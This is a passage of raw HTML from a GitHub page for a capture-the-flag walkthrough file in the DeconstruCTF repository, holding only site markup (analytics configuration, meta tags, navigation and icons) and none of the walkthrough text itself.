{"experimentIds": [], "id": "20456699683", "key": "click.pricing_calculator.15_members"}, {"experimentIds": [], "id": "20467868331", "key": "click.pricing_calculator.10_members"}, {"experimentIds": [], "id": "20476267432", "key": "click.trial_days_remaining"}, {"experimentIds": ["20479227424"], "id": "20476357660", "key": "click.discover_feature"}, {"experimentIds": [], "id": "20479287901", "key": "click.pricing_calculator.custom_members"}, {"experimentIds": [], "id": "20481107083", "key": "click.recommended_plan_in_signup.apply_teacher_benefits"}, {"experimentIds": [], "id": "20483089392", "key": "click.pricing_calculator.5_members"}, {"experimentIds": ["20479227424", "20652570897"], "id": "20484283944", "key": "click.onboarding_task"}, {"experimentIds": [], "id": "20484996281", "key": "click.recommended_plan_in_signup.apply_student_benefits"}, {"experimentIds": ["20479227424"], "id": "20486713726", "key": "click.onboarding_task_breadcrumb"}, {"experimentIds": ["20479227424"], "id": "20490791319", "key": "click.upgrade_to_enterprise"}, {"experimentIds": ["20479227424"], "id": "20491786766", "key": "click.talk_to_us"}, {"experimentIds": ["20479227424"], "id": "20494144087", "key": "click.dismiss_enterprise_trial"}, {"experimentIds": ["20479227424", "20652570897"], "id": "20499722759", "key": "completed_all_tasks"}, {"experimentIds": ["20479227424", "20652570897"], "id": "20500710104", "key": "completed_onboarding_tasks"}, {"experimentIds": ["20479227424"], "id": "20513160672", "key": "click.read_doc"}, {"experimentIds": ["20652570897"], "id": "20516196762", "key": "actions_enabled"}, {"experimentIds": ["20479227424"], "id": "20518980986", "key": "click.dismiss_trial_banner"}, {"experimentIds": [], "id": "20535446721", "key": "click.issue_actions_prompt.dismiss_prompt"}, {"experimentIds": [], "id": "20557002247", "key": "click.issue_actions_prompt.setup_workflow"}, {"experimentIds": [], "id": "20595070227", "key": "click.pull_request_setup_workflow"}, {"experimentIds": ["20619150105"], "id": "20626600314", "key": "click.seats_input"}, {"experimentIds": ["20619150105"], "id": "20642310305", "key": "click.decrease_seats_number"}, {"experimentIds": ["20619150105"], "id": "20662990045", "key": "click.increase_seats_number"}, {"experimentIds": [], "id": "20679620969", "key": "click.public_product_roadmap"}, {"experimentIds": ["20479227424"], "id": "20761240940", "key": "click.dismiss_survey_banner"}, {"experimentIds": ["20479227424"], "id": "20767210721", "key": "click.take_survey"}, {"experimentIds": ["20652570897"], "id": "20795281201", "key": "click.archive_list"}], "revision": "968"}" /> <script crossorigin="anonymous" defer="defer" integrity="sha512-NZtGC6blJ7XNT65diVllJBaNYNfq1AF6KQL75eFqN/RlMMwleYJ/a6KTgp7dEeO3Iy3PGM2h52TpyYawjCYqkg==" type="application/javascript" src="https://github.githubassets.com/assets/optimizely-359b460b.js"></script>
<meta name="hostname" content="github.com"> <meta name="user-login" content="">
<meta name="expected-hostname" content="github.com">
<meta name="enabled-features" content="MARKETPLACE_PENDING_INSTALLATIONS,FILE_UPLOAD_CURSOR_POSITION">
<meta http-equiv="x-pjax-version" content="89408a5ac57f5b71ed7ebb466b241a52be13289bf52f5580353d1ab3681a2237"> <meta http-equiv="x-pjax-csp-version" content="9ea82e8060ac9d44365bfa193918b70ed58abd9413362ba412abb161b3a8d1b6"> <meta http-equiv="x-pjax-css-version" content="8c75751aad52ee8322f8435d51506c1b59a636003602b767a0b479bddfe5cb22"> <meta http-equiv="x-pjax-js-version" content="3cad26b543586e12a4ad3073df6bdffcfe52ab9dafecfd0ffc60594d519fb9b5">
<meta name="go-import" content="github.com/deepakdhayal/DeconstruCTF git https://github.com/deepakdhayal/DeconstruCTF.git">
<meta name="octolytics-dimension-user_id" content="48149717" /><meta name="octolytics-dimension-user_login" content="deepakdhayal" /><meta name="octolytics-dimension-repository_id" content="412702904" /><meta name="octolytics-dimension-repository_nwo" content="deepakdhayal/DeconstruCTF" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="412702904" /><meta name="octolytics-dimension-repository_network_root_nwo" content="deepakdhayal/DeconstruCTF" />
<link rel="canonical" href="https://github.com/deepakdhayal/DeconstruCTF/blob/Master/WalkThrough.md" data-pjax-transient>
<meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats">
<meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors">
<meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors">
<link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg">
<meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" />
<link rel="manifest" href="/manifest.json" crossOrigin="use-credentials">
</head>
<body class="logged-out env-production page-responsive page-blob" style="word-wrap: break-word;">
<div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span>
<header class="Header-old header-logged-out js-details-container Details position-relative f4 py-2" role="banner"> <div class="container-xl d-lg-flex flex-items-center p-responsive"> <div class="d-flex flex-justify-between flex-items-center"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github color-text-white"> <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path></svg>
<div class="d-lg-none css-truncate css-truncate-target width-fit p-2">
</div>
<div class="d-flex flex-items-center"> Sign up
<button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target btn-link d-lg-none mt-1"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-three-bars color-text-white"> <path fill-rule="evenodd" d="M1 2.75A.75.75 0 011.75 2h12.5a.75.75 0 110 1.5H1.75A.75.75 0 011 2.75zm0 5A.75.75 0 011.75 7h12.5a.75.75 0 110 1.5H1.75A.75.75 0 011 7.75zM1.75 12a.75.75 0 100 1.5h12.5a.75.75 0 100-1.5H1.75z"></path></svg>
</button> </div> </div>
<div class="HeaderMenu HeaderMenu--logged-out position-fixed top-0 right-0 bottom-0 height-fit position-lg-relative d-lg-flex flex-justify-between flex-items-center flex-auto"> <div class="d-flex d-lg-none flex-justify-end border-bottom color-bg-subtle p-3"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target btn-link"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-x color-icon-secondary"> <path fill-rule="evenodd" d="M5.72 5.72a.75.75 0 011.06 0L12 10.94l5.22-5.22a.75.75 0 111.06 1.06L13.06 12l5.22 5.22a.75.75 0 11-1.06 1.06L12 13.06l-5.22 5.22a.75.75 0 01-1.06-1.06L10.94 12 5.72 6.78a.75.75 0 010-1.06z"></path></svg>
</button> </div>
<nav class="mt-0 px-3 px-lg-0 mb-5 mb-lg-0" aria-label="Global"> <details class="HeaderMenu-details details-overlay details-reset width-full"> <summary class="HeaderMenu-summary HeaderMenu-link px-0 py-3 border-0 no-wrap d-block d-lg-inline-block"> Why GitHub? <svg x="0px" y="0px" viewBox="0 0 14 8" xml:space="preserve" fill="none" class="icon-chevon-down-mktg position-absolute position-lg-relative"> <path d="M1,1l6.2,6L13,1"></path> </svg> </summary> <div class="dropdown-menu flex-auto rounded px-0 mt-0 pb-4 p-lg-4 position-relative position-lg-absolute left-0 left-lg-n4"> Features <span>→</span>
Mobile <span>→</span> Actions <span>→</span> Codespaces <span>→</span> Packages <span>→</span> Security <span>→</span> Code review <span>→</span> Issues <span>→</span> Integrations <span>→</span>
GitHub Sponsors <span>→</span> Customer stories<span>→</span> </div> </details> Team Enterprise
<details class="HeaderMenu-details details-overlay details-reset width-full"> <summary class="HeaderMenu-summary HeaderMenu-link px-0 py-3 border-0 no-wrap d-block d-lg-inline-block"> Explore <svg x="0px" y="0px" viewBox="0 0 14 8" xml:space="preserve" fill="none" class="icon-chevon-down-mktg position-absolute position-lg-relative"> <path d="M1,1l6.2,6L13,1"></path> </svg> </summary>
<div class="dropdown-menu flex-auto rounded px-0 pt-2 pb-0 mt-0 pb-4 p-lg-4 position-relative position-lg-absolute left-0 left-lg-n4"> Explore GitHub <span>→</span>
<h4 class="color-fg-muted text-normal text-mono f5 mb-2 border-lg-top pt-lg-3">Learn and contribute</h4> Topics <span>→</span> Collections <span>→</span> Trending <span>→</span> Learning Lab <span>→</span> Open source guides <span>→</span>
<h4 class="color-fg-muted text-normal text-mono f5 mb-2 border-lg-top pt-lg-3">Connect with others</h4> The ReadME Project <span>→</span> Events <span>→</span> Community forum <span>→</span> GitHub Education <span>→</span> GitHub Stars program <span>→</span> </div> </details>
Marketplace
<details class="HeaderMenu-details details-overlay details-reset width-full"> <summary class="HeaderMenu-summary HeaderMenu-link px-0 py-3 border-0 no-wrap d-block d-lg-inline-block"> Pricing <svg x="0px" y="0px" viewBox="0 0 14 8" xml:space="preserve" fill="none" class="icon-chevon-down-mktg position-absolute position-lg-relative"> <path d="M1,1l6.2,6L13,1"></path> </svg> </summary>
<div class="dropdown-menu flex-auto rounded px-0 pt-2 pb-4 mt-0 p-lg-4 position-relative position-lg-absolute left-0 left-lg-n4"> Plans <span>→</span>
Compare plans <span>→</span> Contact Sales <span>→</span>
Education <span>→</span> </div> </details> </nav>
<div class="d-lg-flex flex-items-center px-3 px-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-3 mb-lg-0">
<div class="header-search flex-auto js-site-search position-relative flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="412702904" data-scoped-search-url="/deepakdhayal/DeconstruCTF/search" data-owner-scoped-search-url="/users/deepakdhayal/search" data-unscoped-search-url="/search" action="/deepakdhayal/DeconstruCTF/search" accept-charset="UTF-8" method="get"> <label class="form-control input-sm header-search-wrapper p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control input-sm header-search-input jump-to-field js-jump-to-field js-site-search-focus js-site-search-field is-clearable" data-hotkey=s,/ name="q" data-test-selector="nav-search-input" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="SWsR9sTfGNWqBwlD5q7f8ATXBnkWRDIe8fDDEF3ecceivuPBFPGEDJkd4JdVh2kb0J5MgFJKSzLqKb1NvxvK3w==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg>
<div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container">
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<span>No suggested jump to results</span>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
</div> </label></form> </div></div>
</div>
<div class="position-relative mr-3 mb-4 mb-lg-0 d-inline-block"> Sign in </div>
Sign up </div> </div> </div></header>
</div>
<div id="start-of-content" class="show-on-focus"></div>
<div data-pjax-replace id="js-flash-container">
<template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class=" px-2" > <button class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> <div>{{ message }}</div>
</div></div> </template></div>
<include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment>
<div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" data-pjax-container >
<div id="repository-container-header" class="pt-3 hide-full-screen mb-5" style="background-color: var(--color-page-header-bg);" data-pjax-replace>
<div class="d-flex mb-3 px-3 px-md-4 px-lg-5">
<div class="flex-auto min-width-0 width-fit mr-3"> <h1 class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-icon-secondary mr-2"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <span> deepakdhayal </span> <span>/</span> DeconstruCTF
<span></span><span>Public</span></h1>
</div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell"> <path d="M8 16a2 2 0 001.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 008 16z"></path><path fill-rule="evenodd" d="M8 1.5A3.5 3.5 0 004.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.018.018 0 00-.003.01l.001.006c0 .002.002.004.004.006a.017.017 0 00.006.004l.007.001h10.964l.007-.001a.016.016 0 00.006-.004.016.016 0 00.004-.006l.001-.007a.017.017 0 00-.003-.01l-1.703-2.554a1.75 1.75 0 01-.294-.97V5A3.5 3.5 0 008 1.5zM3 5a5 5 0 0110 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.518 1.518 0 0113.482 13H2.518a1.518 1.518 0 01-1.263-2.36l1.703-2.554A.25.25 0 003 7.947V5z"></path></svg> Notifications
<div > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom mr-1"> <path fill-rule="evenodd" d="M8 .25a.75.75 0 01.673.418l1.882 3.815 4.21.612a.75.75 0 01.416 1.279l-3.046 2.97.719 4.192a.75.75 0 01-1.088.791L8 12.347l-3.766 1.98a.75.75 0 01-1.088-.79l.72-4.194L.818 6.374a.75.75 0 01.416-1.28l4.21-.611L7.327.668A.75.75 0 018 .25zm0 2.445L6.615 5.5a.75.75 0 01-.564.41l-3.097.45 2.24 2.184a.75.75 0 01.216.664l-.528 3.084 2.769-1.456a.75.75 0 01.698 0l2.77 1.456-.53-3.084a.75.75 0 01.216-.664l2.24-2.183-3.096-.45a.75.75 0 01-.564-.41L8 2.694v.001z"></path></svg> <span> Star</span>
0 </div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked"> <path fill-rule="evenodd" d="M5 3.25a.75.75 0 11-1.5 0 .75.75 0 011.5 0zm0 2.122a2.25 2.25 0 10-1.5 0v.878A2.25 2.25 0 005.75 8.5h1.5v2.128a2.251 2.251 0 101.5 0V8.5h1.5a2.25 2.25 0 002.25-2.25v-.878a2.25 2.25 0 10-1.5 0v.878a.75.75 0 01-.75.75h-4.5A.75.75 0 015 6.25v-.878zm3.75 7.378a.75.75 0 11-1.5 0 .75.75 0 011.5 0zm3-8.75a.75.75 0 100-1.5.75.75 0 000 1.5z"></path></svg> Fork
0
</div>
<div id="responsive-meta-container" data-pjax-replace></div>
<nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M4.72 3.22a.75.75 0 011.06 1.06L2.06 8l3.72 3.72a.75.75 0 11-1.06 1.06L.47 8.53a.75.75 0 010-1.06l4.25-4.25zm6.56 0a.75.75 0 10-1.06 1.06L13.94 8l-3.72 3.72a.75.75 0 101.06 1.06l4.25-4.25a.75.75 0 000-1.06l-4.25-4.25z"></path></svg> <span>Code</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path><path fill-rule="evenodd" d="M8 0a8 8 0 100 16A8 8 0 008 0zM1.5 8a6.5 6.5 0 1113 0 6.5 6.5 0 01-13 0z"></path></svg> <span>Issues</span> <span>0</span>
